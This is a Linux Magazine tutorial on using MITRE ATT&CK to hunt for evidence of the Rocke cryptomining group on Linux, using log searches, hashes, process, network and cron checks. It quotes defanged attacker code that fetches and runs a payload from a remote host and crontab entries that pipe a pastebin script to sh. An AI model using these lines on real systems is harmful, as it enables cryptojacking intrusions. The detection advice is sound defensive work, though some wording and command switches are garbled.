Working with the MITRE ATT&CK knowledge base
Detective Work
The MITRE ATT&CK website keeps information on attackers and intrusion techniques. We'll show you how to use that information to look for evidence of an attack.
Security has many facets and angles, and if you really want to be safe, you need to be aware of them all. One important skill is to become familiar with the logfiles on your system and the information they might reveal (see the box entitled "All About Logs"). But the attackers have become increasingly sophisticated in recent years, and to stay ahead of them, you need all the help you can get. Another important source of information is the MITRE ATT&CK website [1]. MITRE ATT&CK is a structured, globally available knowledge base describing tactics and attackers. In addition to tracking the various attack methods used in the wild, MITRE ATT&CK also provides clues that will help you look for evidence.
About Logs
Linux systems store data in logfiles. You can specify four main categories of logs: applications, events, services, and systems. Most logs are stored as text. Entries typically include important information such as: time, type, and severity levels of the event, as well as the name of the process and the Process ID (PID). Of course, there are also exceptions, such as wtmp
or lastlog
which have a binary format. Generally, files with logos are available in the /var/log
directory, but not always. It happens that some programs save their diary files in other places.
In the event that systemd
operates on your Linux system, many users reach for the journalctl
command, which displays the messages of the systemd
recorder.
When diagnosing problems or errors, the first thing you need to do is to check the logs. Searching for something in logs can be boring and time consuming. That is why many users prefer to use simple twists in the Bash shell. Text processing commands like grep
and awk
are popular tools for searching out log information. These tools are especially useful for quick, one-liner queries. The use of scripts will save time and make it easier to extract valuable data from logs.
An example of a simple uniform script is:
grep -E -r -o "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort | uniq | grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" > our-data.txt
The grep
command uses a regular expression (the -e
switch allows you to search with regex) to search data in the catalogs recursively (switch -R
) and then displays the matched data parts in a separate line. The sort
command sorts data, and the uniq
command deletes duplicates. Then the result of this operation is saved to the our-data.txt
file.
Searching for Evidence
It's best to learn from examples. One threat facing users today is attacks related to stealing system resources for the purposes of mining cryptocurrency. The techniques that hackers use are quite interesting and sometimes unconventional. The Rocke group is a good example. Rocke is a Chinese group of cyber criminals who specialize in malware attacks to gain access for crypto mining [2][3][4][5]. This group has been operating since 2018 and is dynamically developing its arsenal. The group evolves quickly and changes its techniques. Analysis of a Rocke group attack is not as easy as it might seem, but luckily, you can turn to the MITRE ATT&CK framework. Some of the techniques that MITRE ATT&CK associates with the Rocke group include:
- T1036.005 – Masquerading: Match Legitimate Name or Location
- T1053.003 – Scheduled Task/Job: Cron
- T1574.006 – Hijack Execution Flow: Dynamic Linker Hijacking
The following sections takes a closer look at these techniques and what to do about them, but before delving into the details, remember that it is always a good idea to look for suspicious files.
Malware often creates files in the following directories:
/usr/local
/usr/sbin
/tmp
It is worth looking at these locations and checking if there are suspicious files in them. You might find file names similar to the correct ones, and sometimes a file might be generated automatically and take a series of numbers. It is good to check the hash of these files. If the hash is different from what it is supposed to be, that is an indication that the file has been replaced or tampered with. You can use the VirusTotal platform [6] to check whether the hash is what it is supposed to be. The following command will find every executable file and check its control sum (SHA256), and the results will be saved to the list.txt
file:
find -type f -exec sha256sum '{}' \; > list.txt
T1036.005: Masquerading
Suppose the group downloads a payload using the curl
or wet
command. The configuration file and the malware binary file are saved in the /tmp
directory called kthrotlds
. The launch malware is using the nohup
command, rejecting the output data and enabling the background binary file to be made. Performing this process is a form of masking. The system will constantly perform a process called kthrotlds
, but the processes will not use binary files in the /tmp
folder.
Listing 1 shows part of the malicious code.
Listing 1
Malicious Code
01 if [ ${ARCH}x = "x86_64x" ]; then 02 (curl -fsSL hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -o \ 03 /tmp/kthrotlds||wget -q hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -O \ 04 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds 05 elif [ ${ARCH}x = "i686x" ]; then 06 (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \ 07 /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \ 08 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds 09 else 10 (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \ 11 /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \ 12 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds 13 fi 14 nohup /tmp/kthrotlds >/dev/null 2>&1 &
By default, Linux does not log information on open ports and connections. However, netstat
comes to the rescue:
netstat -tupln
This command will return information on connections (port and IP address) to and from the system. You can trace the connections that are set and then track down the most undesirable ones.
Another way to check for a masked process is with the ps
command:
ps auxf
This command will display a list of processes running in the system. A malicious process often appears in square brackets, meaning that there are no arguments at the command line and it is possibly running as a thread.
T1053.003 – Cron
Hackers use a variety of techniques to achieve persistent access to the system after restarting. One of these methods is to add tasks to the cron tool. Cron allows you to plan your tasks and gives you the ability to follow commands according to the schedule without logging into the system. Listing 2 shows a few crontab
entries that could execute malicious code.
Listing 2
Crontab Entries
01 "*/10 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh 02 ##" 03 04 "*/15 * * * * (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh 05 ##"
In this case, the attacker does two things:
- Adds a new
crontab
entry that points to a malicious script. - Places the malicious script in a folder, which will allow it to execute at a specific time defined in the
crontab
entry.
That is why it is always worth checking cron tasks to look for suspicious entries:
crontab -l
Malware can manipulate the cron utility in various ways, therefore it is also worth looking at the following locations:
/var/spool/cron/root
/var/spool/cron/crontabs/root
/etc/cron.d/root
/etc/cron.hourly/oanacroner
/etc/cron.daily/oanacroner
/etc/cron.monthly/oanacroner
Or perform a search to find other cron-related files and directories on your system.
Buy this article as PDF
(incl. VAT)
Buy Linux Magazine
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters
Support Our Work
Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.
News
-
Halcyon Creates Anti-Ransomware Protection for Linux
As more and more Linux systems are getting targeted by ransomware, Halcyon is stepping up its protection.
-
Valve and Arch Linux Announce Collaboration
Valve and Arch have come together for two projects that will have a serious impact on the Linux distribution.
-
Hacker Successfully Runs Linux on a CPU from the Early ‘70s
From the office of "Look what I can do," Dmitry Grinberg was able to get Linux running on a processor that was created in 1971.
-
OSI and LPI Form Strategic Alliance
With a goal of strengthening Linux and open source communities, this new alliance aims to nurture the growth of more highly skilled professionals.
-
Fedora 41 Beta Available with Some Interesting Additions
If you're a Fedora fan, you'll be excited to hear the beta version of the latest release is now available for testing and includes plenty of updates.
-
AlmaLinux Unveils New Hardware Certification Process
The AlmaLinux Hardware Certification Program run by the Certification Special Interest Group (SIG) aims to ensure seamless compatibility between AlmaLinux and a wide range of hardware configurations.
-
Wind River Introduces eLxr Pro Linux Solution
eLxr Pro offers an end-to-end Linux solution backed by expert commercial support.
-
Juno Tab 3 Launches with Ubuntu 24.04
Anyone looking for a full-blown Linux tablet need look no further. Juno has released the Tab 3.
-
New KDE Slimbook Plasma Available for Preorder
Powered by an AMD Ryzen CPU, the latest KDE Slimbook laptop is powerful enough for local AI tasks.
-
Rhino Linux Announces Latest "Quick Update"
If you prefer your Linux distribution to be of the rolling type, Rhino Linux delivers a beautiful and reliable experience.